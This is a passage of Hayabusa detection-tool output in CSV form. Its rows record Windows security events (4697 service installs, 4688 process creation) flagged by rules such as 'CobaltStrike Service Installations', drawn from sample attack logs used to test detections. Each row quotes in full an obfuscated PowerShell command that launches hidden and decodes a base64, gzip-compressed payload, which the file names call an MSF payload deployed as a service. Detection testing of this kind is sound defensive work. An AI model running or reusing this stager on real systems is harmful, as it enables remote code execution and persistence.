System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1659379",../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,../hayabusa-rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,../hayabusa-rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,info,Persis,Service Installed,"Name: iOWamcEn | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1659379",../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx 2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,../hayabusa-rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx 2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,../hayabusa-rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx 2021-04-21 23:56:43.246 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1510 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-21 23:56:43.246 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1510 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:56:43.280 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1140 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-21 23:56:43.280 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1140 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:56:46.597 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryF